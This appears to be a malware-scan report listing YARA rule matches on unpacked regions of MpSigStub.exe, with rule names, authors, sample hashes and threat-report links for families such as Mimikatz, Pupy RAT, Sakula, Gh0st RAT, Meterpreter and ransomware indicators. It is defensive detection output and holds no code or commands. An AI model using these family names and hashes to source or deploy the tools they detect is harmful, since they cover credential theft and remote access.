Source: 38.3.MpSigStub.exe.138bdac8e06.95.unpack, type: UNPACKEDPE	Matched rule: hacktool_macos_keylogger_logkext author = @mimeframe, description = LogKext is an open source keylogger for Mac OS X, a product of FSB software., reference = https://github.com/SlEePlEs5/logKext
Source: 38.3.MpSigStub.exe.138bdac8e06.95.unpack, type: UNPACKEDPE	Matched rule: Mimikatz_Strings date = 2016-06-08, author = Florian Roth, description = Detects Mimikatz strings, reference = not set, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 38.3.MpSigStub.exe.138bdac8e06.95.unpack, type: UNPACKEDPE	Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 38.3.MpSigStub.exe.138bdbb54b5.110.raw.unpack, type: UNPACKEDPE	Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 38.3.MpSigStub.exe.138bda7fcc2.60.raw.unpack, type: UNPACKEDPE	Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 38.3.MpSigStub.exe.138beac8d52.115.raw.unpack, type: UNPACKEDPE	Matched rule: APT_MAL_Sandworm_Exaramel_Configuration_Key author = FR/ANSSI/SDO, description = Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[...
Source: 38.3.MpSigStub.exe.138beac8d52.115.raw.unpack, type: UNPACKEDPE	Matched rule: APT_APT29_sorefang_modify_alphabet_custom_encode author = NCSC, description = Rule to detect SoreFang based on arguments passed into custom encoding algorithm function, reference = https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development, hash = 58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2
Source: 38.3.MpSigStub.exe.138beac8d52.115.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 38.3.MpSigStub.exe.138beaf1482.85.raw.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, reference = Internal Research, score = 2017-07-17, modified = 2021-03-15, nodeepdive =
Source: 38.3.MpSigStub.exe.138beaf1482.85.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6
Source: 38.3.MpSigStub.exe.138beaf1482.85.raw.unpack, type: UNPACKEDPE	Matched rule: APT_PupyRAT_PY date = 2017-02-17, hash1 = 8d89f53b0a6558d6bb9cdbc9f218ef699f3c87dd06bc03dd042290dedc18cb71, author = Florian Roth, description = Detects Pupy RAT, reference = https://www.secureworks.com/blog/iranian-pupyrat-bites-middle-eastern-organizations, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 38.3.MpSigStub.exe.138beaf1482.85.raw.unpack, type: UNPACKEDPE	Matched rule: Pupy_Backdoor date = 2017-08-11, hash5 = 06bb41c12644ca1761bcb3c14767180b673cb9d9116b555680073509e7063c3e, hash4 = 20e19817f72e72f87c794843d46c55f2b8fd091582bceca0460c9f0640c7bbd8, hash3 = 90757c1ae9597bea39bb52a38fb3d497358a2499c92c7636d71b95ec973186cc, hash2 = 83380f351214c3bd2c8e62430f70f8f90d11c831695027f329af04806b9f8ea4, hash1 = ae93714203c7ab4ab73f2ad8364819d16644c7649ea04f483b46924bd5bc0153, author = Florian Roth, description = Detects Pupy backdoor, hash7 = 8784c317e6977b4c201393913e76fc11ec34ea657de24e957d130ce9006caa01, hash6 = be83c513b24468558dc7df7f63d979af41287e568808ed8f807706f6992bfab2, reference = https://github.com/n1nj4sec/pupy-binaries, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 38.3.MpSigStub.exe.138bda7f0be.62.raw.unpack, type: UNPACKEDPE	Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 38.3.MpSigStub.exe.138beac654a.116.raw.unpack, type: UNPACKEDPE	Matched rule: APT_MAL_Sandworm_Exaramel_Configuration_Key author = FR/ANSSI/SDO, description = Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[...
Source: 38.3.MpSigStub.exe.138beac654a.116.raw.unpack, type: UNPACKEDPE	Matched rule: APT_APT29_sorefang_modify_alphabet_custom_encode author = NCSC, description = Rule to detect SoreFang based on arguments passed into custom encoding algorithm function, reference = https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development, hash = 58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2
Source: 38.3.MpSigStub.exe.138beac654a.116.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 38.3.MpSigStub.exe.138bd025981.88.raw.unpack, type: UNPACKEDPE	Matched rule: Gen_Net_LocalGroup_Administrators_Add_Command date = 2017-07-08, author = Florian Roth, description = Detects an executable that contains a command to add a user account to the local administrators group, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 38.3.MpSigStub.exe.138bd025981.88.raw.unpack, type: UNPACKEDPE	Matched rule: APT_DeputyDog_Fexel author = ThreatConnect Intelligence Research Team
Source: 38.3.MpSigStub.exe.138bd0cf16e.156.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_Microsoft_7z_SFX_Combo date = 2018-09-16, hash1 = cce63f209ee4efb4f0419fb4bbb32326392b5ef85cfba80b5b42b861637f1ff1, author = Florian Roth, description = Detects a suspicious file that has a Microsoft copyright and is a 7z SFX, reference = Internal Research
Source: 38.3.MpSigStub.exe.138be567efd.37.raw.unpack, type: UNPACKEDPE	Matched rule: TA17_293A_malware_1 date = 2017/07/17, hash5 = 038A97B4E2F37F34B255F0643E49FC9D, hash4 = 04738CA02F59A5CD394998A99FCD9613, hash3 = 8943E71A8C73B5E343AA9D2E19002373, hash2 = BA756DD64C1147515BA2298B6A760260, hash1 = A07AA521E7CAFB360294E56969EDA5D6, hash0 = 61C909D2F625223DB2FB858BBDF42A76, author = US-CERT Code Analysis Team (modified by Florian Roth), description = inveigh pen testing tools & related artifacts, hash10 = 4595DBE00A538DF127E0079294C87DA0, hash9 = 722154A36F32BA10E98020A8AD758A7A, hash8 = 5DBEF7BDDAF50624E840CCBCE2816594, hash7 = AA905A3508D9309A93AD5C0EC26EBC9B, hash6 = 65A1A73253F04354886F375B59550B46, reference = https://www.us-cert.gov/ncas/alerts/TA17-293A
Source: 38.3.MpSigStub.exe.138be567efd.37.raw.unpack, type: UNPACKEDPE	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 38.3.MpSigStub.exe.138be8fa80e.86.raw.unpack, type: UNPACKEDPE	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 38.3.MpSigStub.exe.138bd31742c.64.unpack, type: UNPACKEDPE	Matched rule: clearlog date = 2017-06-02, hash1 = 14093ce6d0fe8ab60963771f48937c669103842a0400b8d97f829b33c420f7e3, author = Florian Roth, description = Detects Fireball malware - file clearlog.dll, reference = https://goo.gl/4pTkGQ, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 38.3.MpSigStub.exe.138be62480a.80.unpack, type: UNPACKEDPE	Matched rule: Gen_Net_LocalGroup_Administrators_Add_Command date = 2017-07-08, author = Florian Roth, description = Detects an executable that contains a command to add a user account to the local administrators group, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 38.3.MpSigStub.exe.138be1451ae.105.raw.unpack, type: UNPACKEDPE	Matched rule: Trojan_Win32_PlaKeylog_B author = Microsoft, description = Keylogger component, activity_group = Platinum, version = 1.0, unpacked_sample_sha1 = 6a1412daaa9bdc553689537df0a004d44f8a45fd, last_modified = 2016-04-12, original_sample_sha1 = 0096a3e0c97b85ca75164f48230ae530c94a2b77
Source: 38.3.MpSigStub.exe.138be1451ae.105.raw.unpack, type: UNPACKEDPE	Matched rule: APT_DNSpionage_Karkoff_Malware_Apr19_1 date = 2019-04-24, hash4 = cd4b9d0f2d1c0468750855f0ed352c1ed6d4f512d66e0e44ce308688235295b5, hash3 = 5b102bf4d997688268bab45336cead7cdf188eb0d6355764e53b4f62e1cdf30c, hash2 = b017b9fc2484ce0a5629ff1fed15bca9f62f942eafbb74da6a40f40337187b04, hash1 = 6a251ed6a2c6a0a2be11f2a945ec68c814d27e2b6ef445f4b2c7a779620baa11, author = Florian Roth, description = Detects DNSpionage Karkoff malware, reference = https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html
Source: 38.3.MpSigStub.exe.138be1451ae.105.raw.unpack, type: UNPACKEDPE	Matched rule: DeepPanda_htran_exe date = 2015/02/08, author = Florian Roth, description = Hack Deep Panda - htran-exe, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 38e21f0b87b3052b536408fdf59185f8b3d210b9
Source: 38.3.MpSigStub.exe.138be1451ae.105.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_DropperBackdoor_Keywords date = 2019-04-24, hash1 = cd4b9d0f2d1c0468750855f0ed352c1ed6d4f512d66e0e44ce308688235295b5, author = Florian Roth, description = Detects suspicious keywords that indicate a backdoor, reference = https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html
Source: 38.3.MpSigStub.exe.138be1451ae.105.raw.unpack, type: UNPACKEDPE	Matched rule: APT_APT41_POISONPLUG date = 2019-08-07, hash4 = 3e6c4e97cc09d0432fbbbf3f3e424d4aa967d3073b6002305cd6573c47f0341f, hash3 = f4d57acde4bc546a10cd199c70cdad09f576fdfe66a36b08a00c19ff6ae19661, hash2 = 5d971ed3947597fbb7e51d806647b37d64d9fe915b35c7c9eaf79a37b82dab90, author = Florian Roth, description = Detects APT41 malware POISONPLUG, reference = https://www.fireeye.com/blog/threat-research/2019/08/apt41-dual-espionage-and-cyber-crime-operation.html, score = 2eea29d83f485897e2bac9501ef000cc266ffe10019d8c529555a3435ac4aabd
Source: 38.3.MpSigStub.exe.138be1451ae.105.raw.unpack, type: UNPACKEDPE	Matched rule: APT_MAL_HOPLIGHT_NK_HiddenCobra_Apr19_3 date = 2019-04-13, hash3 = ddea408e178f0412ae78ff5d5adf2439251f68cad4fd853ee466a3c74649642d, hash2 = 05feed9762bc46b47a7dc5c469add9f163c16df4ddaafe81983a628da5714461, hash1 = 2151c1977b4555a1761c12f151969f8e853e26c396fa1a7b74ccbaf3a48f4525, author = Florian Roth, description = Detects HOPLIGHT malware used by HiddenCobra APT group, reference = https://www.us-cert.gov/ncas/analysis-reports/AR19-100A
Source: 38.3.MpSigStub.exe.138be1deebe.15.unpack, type: UNPACKEDPE	Matched rule: MiniRAT_Gen_1 date = 2018-01-22, hash5 = 675c3d96070dc9a0e437f3e1b653b90dbc6700b0ec57379d4139e65f7d2799cd, hash4 = ed97719c008422925ae21ff34448a8c35ee270a428b0478e24669396761d0790, hash3 = ba4e063472a2559b4baa82d5272304a1cdae6968145c5ef221295c90e88458e2, hash2 = b6ac374f79860ae99736aaa190cce5922a969ab060d7ae367dbfa094bfe4777d, hash1 = 091ae8d5649c4e040d25550f2cdf7f1ddfc9c698e672318eb1ab6303aa1cf85b, author = Florian Roth, description = Detects Mini RAT malware, reference = https://www.eff.org/deeplinks/2018/01/dark-caracal-good-news-and-bad-news, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 38.3.MpSigStub.exe.138be1deebe.15.unpack, type: UNPACKEDPE	Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
Source: 38.3.MpSigStub.exe.138be1deebe.15.unpack, type: UNPACKEDPE	Matched rule: malware_sakula_xorloop author = David Cannings, description = XOR loops from Sakula malware, md5 = fc6497fe708dbda9355139721b6181e7
Source: 38.3.MpSigStub.exe.138be1deebe.15.unpack, type: UNPACKEDPE	Matched rule: RAT_Sakula date = 2015-10-13, author = Airbus Defence and Space Cybersecurity CSIRT - Yoann Francou / NCC Group David Cannings, description = Detects Sakula v1.0 RAT, reference = http://blog.airbuscybersecurity.com/public/YFR/sakula_v1x.yara
Source: 38.3.MpSigStub.exe.138be1deebe.15.unpack, type: UNPACKEDPE	Matched rule: HackTool_MSIL_SharpHound_3 author = FireEye, description = The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the \'.csproj\' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = eeedc09570324767a3de8205f66a5295
Source: 38.3.MpSigStub.exe.138be1deebe.15.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_SharpHound3 date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/BloodHoundAD/SharpHound3, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 38.3.MpSigStub.exe.138be1deebe.15.unpack, type: UNPACKEDPE	Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 38.3.MpSigStub.exe.138be19fadd.13.unpack, type: UNPACKEDPE	Matched rule: MiniRAT_Gen_1 date = 2018-01-22, hash5 = 675c3d96070dc9a0e437f3e1b653b90dbc6700b0ec57379d4139e65f7d2799cd, hash4 = ed97719c008422925ae21ff34448a8c35ee270a428b0478e24669396761d0790, hash3 = ba4e063472a2559b4baa82d5272304a1cdae6968145c5ef221295c90e88458e2, hash2 = b6ac374f79860ae99736aaa190cce5922a969ab060d7ae367dbfa094bfe4777d, hash1 = 091ae8d5649c4e040d25550f2cdf7f1ddfc9c698e672318eb1ab6303aa1cf85b, author = Florian Roth, description = Detects Mini RAT malware, reference = https://www.eff.org/deeplinks/2018/01/dark-caracal-good-news-and-bad-news, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 38.3.MpSigStub.exe.138be19fadd.13.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6
Source: 38.3.MpSigStub.exe.138be19fadd.13.unpack, type: UNPACKEDPE	Matched rule: malware_sakula_xorloop author = David Cannings, description = XOR loops from Sakula malware, md5 = fc6497fe708dbda9355139721b6181e7
Source: 38.3.MpSigStub.exe.138be19fadd.13.unpack, type: UNPACKEDPE	Matched rule: HackTool_Samples description = Hacktool, score =
Source: 38.3.MpSigStub.exe.138be19fadd.13.unpack, type: UNPACKEDPE	Matched rule: RAT_Sakula date = 2015-10-13, author = Airbus Defence and Space Cybersecurity CSIRT - Yoann Francou / NCC Group David Cannings, description = Detects Sakula v1.0 RAT, reference = http://blog.airbuscybersecurity.com/public/YFR/sakula_v1x.yara
Source: 38.3.MpSigStub.exe.138be19fadd.13.unpack, type: UNPACKEDPE	Matched rule: HackTool_MSIL_SharpHound_3 author = FireEye, description = The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the \'.csproj\' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = eeedc09570324767a3de8205f66a5295
Source: 38.3.MpSigStub.exe.138be19fadd.13.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_SharpHound3 date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/BloodHoundAD/SharpHound3, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 38.3.MpSigStub.exe.138be19fadd.13.unpack, type: UNPACKEDPE	Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 38.3.MpSigStub.exe.138be19fadd.13.unpack, type: UNPACKEDPE	Matched rule: MirageStrings author = Seth Hardy, description = Mirage Identifying Strings, last_modified = 2014-06-25
Source: 38.3.MpSigStub.exe.138bce174da.16.raw.unpack, type: UNPACKEDPE	Matched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = Internal Research
Source: 38.3.MpSigStub.exe.138bd8c206c.234.raw.unpack, type: UNPACKEDPE	Matched rule: GhostDragon_Gh0stRAT date = 2016-04-23, hash4 = b803381535ac24ce7c8fdcf6155566d208dfca63fd66ec71bbc6754233e251f5, hash3 = 6c7f8ba75889e0021c4616fcbee86ac06cd7f5e1e355e0cbfbbb5110c08bb6df, hash2 = 99ee5b764a5db1cb6b8a4f62605b5536487d9c35a28a23de8f9174659f65bcb2, hash1 = f9a669d22866cd041e2d520c5eb093188962bea8864fdfd0c0abb2b254e9f197, author = Florian Roth, description = Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report, reference = https://blog.cylance.com/the-ghost-dragon, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 38.3.MpSigStub.exe.138bd8c206c.234.raw.unpack, type: UNPACKEDPE	Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 38.3.MpSigStub.exe.138bd0acad5.154.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6
Source: 38.3.MpSigStub.exe.138bd0acad5.154.unpack, type: UNPACKEDPE	Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 38.3.MpSigStub.exe.138bd0acad5.154.unpack, type: UNPACKEDPE	Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 38.3.MpSigStub.exe.138bd0acad5.154.unpack, type: UNPACKEDPE	Matched rule: xtremrat date = 2012-07-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Xtrem RAT v3.5, version = 1.0
Source: 38.3.MpSigStub.exe.138bd0acad5.154.unpack, type: UNPACKEDPE	Matched rule: korlia author = Nick Hoffman, reference = http://www.morphick.com/resources/lab-blog/curious-korlia, company = Morphick, information = korlia malware found in apt dump
Source: 38.3.MpSigStub.exe.138bde736d2.82.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 38.3.MpSigStub.exe.138bde736d2.82.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 38.3.MpSigStub.exe.138bde736d2.82.unpack, type: UNPACKEDPE	Matched rule: SUSP_PDB_Path_Keywords date = 2019-10-04, author = Florian Roth, description = Detects suspicious PDB paths, reference = https://twitter.com/stvemillertime/status/1179832666285326337?s=20
Source: 38.3.MpSigStub.exe.138bde736d2.82.unpack, type: UNPACKEDPE	Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
Source: 38.3.MpSigStub.exe.138bde736d2.82.unpack, type: UNPACKEDPE	Matched rule: Greenbug_Malware_4 date = 2017-01-25, hash2 = 82beaef407f15f3c5b2013cb25901c9fab27b086cadd35149794a25dce8abcb9, author = Florian Roth, description = Detects ISMDoor Backdoor, reference = https://goo.gl/urp4CD, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 308a646f57c8be78e6a63ffea551a84b0ae877b23f28a660920c9ba82d57748f
Source: 38.3.MpSigStub.exe.138bceeeac2.66.raw.unpack, type: UNPACKEDPE	Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 38.3.MpSigStub.exe.138bceeeac2.66.raw.unpack, type: UNPACKEDPE	Matched rule: Unspecified_Malware_Sep1_A1 date = 2017-09-12, hash1 = 28143c7638f22342bff8edcd0bedd708e265948a5fcca750c302e2dca95ed9f0, author = Florian Roth, description = Detects malware from DrqgonFly APT report, reference = https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE	Matched rule: MiniRAT_Gen_1 date = 2018-01-22, hash5 = 675c3d96070dc9a0e437f3e1b653b90dbc6700b0ec57379d4139e65f7d2799cd, hash4 = ed97719c008422925ae21ff34448a8c35ee270a428b0478e24669396761d0790, hash3 = ba4e063472a2559b4baa82d5272304a1cdae6968145c5ef221295c90e88458e2, hash2 = b6ac374f79860ae99736aaa190cce5922a969ab060d7ae367dbfa094bfe4777d, hash1 = 091ae8d5649c4e040d25550f2cdf7f1ddfc9c698e672318eb1ab6303aa1cf85b, author = Florian Roth, description = Detects Mini RAT malware, reference = https://www.eff.org/deeplinks/2018/01/dark-caracal-good-news-and-bad-news, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE	Matched rule: HKTL_Meterpreter_inMemory date = 2020-06-29, author = netbiosX, Florian Roth, description = Detects Meterpreter in-memory, reference = https://www.reddit.com/r/purpleteamsec/comments/hjux11/meterpreter_memory_indicators_detection_tooling/, score =
Source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE	Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
Source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, reference = Internal Research, score = 2017-07-17, modified = 2021-03-15, nodeepdive =
Source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE	Matched rule: REDLEAVES_DroppedFile_ImplantLoader_Starburn author = USG, description = Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A, true_positive = 7f8a867a8302fe58039a6db254d335ae
Source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE	Matched rule: ZxShell_Jul17 date = 2017-07-08, hash1 = 5d2a4cde9fa7c2fdbf39b2e2ffd23378d0c50701a3095d1e91e3cf922d7b0b16, author = Florian Roth, description = Detects a ZxShell - CN threat group, reference = https://blogs.rsa.com/cat-phishing/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE	Matched rule: malware_sakula_xorloop author = David Cannings, description = XOR loops from Sakula malware, md5 = fc6497fe708dbda9355139721b6181e7
Source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE	Matched rule: IMPLANT_4_v5 date = 2017-02-10, author = US CERT, description = BlackEnergy / Voodoo Bear Implant by APT28, reference = https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE, score =
Source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE	Matched rule: IMPLANT_5_v3 date = 2017-02-10, author = US CERT, description = XTunnel Implant by APT28, reference = https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE, score =
Source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_NAME_SharPyShell date = 2021-01-22, author = Arnim Rupp, description = Detects .NET red/black-team tools via name, reference = https://github.com/antonioCoco/SharPyShell, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_NAME_DotNetInject date = 2021-01-22, author = Arnim Rupp, description = Detects .NET red/black-team tools via name, reference = https://github.com/dtrizna/DotNetInject, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE	Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_NAME_ibombshell date = 2021-01-22, author = Arnim Rupp, description = Detects .NET red/black-team tools via name, reference = https://github.com/Telefonica/ibombshell, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE	Matched rule: RAT_Sakula date = 2015-10-13, author = Airbus Defence and Space Cybersecurity CSIRT - Yoann Francou / NCC Group David Cannings, description = Detects Sakula v1.0 RAT, reference = http://blog.airbuscybersecurity.com/public/YFR/sakula_v1x.yara
